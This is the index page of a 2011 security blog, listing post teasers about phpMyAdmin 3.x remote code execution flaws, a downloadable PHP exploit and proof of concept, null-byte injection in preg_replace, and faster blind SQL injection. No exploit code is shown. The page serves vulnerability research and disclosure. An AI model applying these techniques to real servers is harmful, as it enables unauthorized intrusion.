( ~~~ )
  ))^ ^((
 ((* - *))
   _) (_
 / '--' \     ^
//(_  _)\\   /_\
\\ )__( //   .'
 (( v  ))   (
   \| /\     '-.
    K(  \       )
    |\\  '-._.-'
    ||\\
  *_-P/,P
     '-
Want your PHP application manually audited? Check out Xxor AB's PHP Security Auditing Service

Friday, July 29, 2011

Encrypt.se New Feature: Key exchange

Encrypt.se is a small tool that helps anyone to easily send encrypted messages. There is no registration, no cookies, no hassle.
Read more about it in this previous post: http://ha.xxor.se/2011/07/encryptse-beta-open-for-public.html

The Key Exchange feature enables users of Encrypt.se to communicate their secret crypto key to their friends over the phone, even if someone might be listening.
Read more »
Upplagd av Mango kl. 6:17 PM 28 kommentarer
Etiketter: , , ,

Saturday, July 9, 2011

phpMyAdmin 3.x Swekey RCI Exploit

Someone else submitted a working python exploit to exploit-db. It's already out there so I might as well publish my original exploit written in PHP.
2011-07-20 - Fixed some bugs in the exploit.

Download here
Upplagd av Mango kl. 2:01 AM 30 kommentarer
Etiketter: , ,

Friday, July 8, 2011

Encrypt.se Beta open for the public

Encrypt is a small project of mine with it's first stable beta recently opened up for public access. The goal has been to create an encryption tool for shorter messages, which is as secure as possible, yet simple to use.

Click here to visit Encrypt.se
Read more »
Upplagd av Mango kl. 10:51 PM 37 kommentarer
Etiketter: , ,

phpMyAdmin 3.x preg_replace RCE POC

I'm flooded with requests for a POC and many doubt that these vulnerabilities are exploitable. And since this vulnerability is rather technically interesting I believe many could learn from it.

The POC uses the session manipulation vulnerability in combination with the remote code execution in preg_replace as detailed in my last blogpost. It will only confirm if the instance is exploitable or not and you need to have valid credentials to the database. Use responsibly.

Download here


Edit:As 0x6a616d6573 reminded me of, blogger removes "%00" if not carefully encoded. The code posted where messed up due to this. (The downloadable file where still fine)
Now it's fixed. I also added the "//" as suggested.
Upplagd av Mango kl. 4:32 PM 56 kommentarer
Etiketter: , ,

Thursday, July 7, 2011

phpMyAdmin 3.x Multiple Remote Code Executions

This post details a few interesting vulnerabilities I found while relaxing and reading the sourcecode of phpMyAdmin. My original advisory can be found here.
Read more »
Upplagd av Mango kl. 7:49 PM 651 kommentarer
Etiketter: ,

Wednesday, June 29, 2011

Null Byte Injection in preg_replace()

When reviewing some PHP code, I came across a real world example of a strange and undocumented (but it's been breifly mentiond in MOPS Submission 07) feature/bug in the function preg_replace. On certain systems, preg_replace seems to be vulnerable to a null byte injection. If both the first and second argument is derived from user input this could lead to a remote code execution.
Read more »
Upplagd av Mango kl. 9:30 PM 46 kommentarer
Etiketter:

Tuesday, June 21, 2011

Speeding up Blind SQL Injections using Conditional Errors in MySQL

Please note that this article expects some prior knowledge of blind SQL injections.

Edit: If you want to read about this in Russisn, its been published here in 2009.
Edit2: jrm` provided me with a working implementation of this method which he coded using information from this article. His code can be read at the bottom of this article or downloaded here.
Edit3: jrm` also created python script which can be downloaded here.

Usually a syntax error in a blind SQL injection will have some sort of visible effect in the output of a web application. So what if we could conditionally generate such an error instead of relying on conditionally delaying and timing a request using functions such as BENCHMARK or SLEEP?
Read more »
Upplagd av Mango kl. 12:41 AM 39 kommentarer
Etiketter: ,
Subscribe to: Posts (Atom)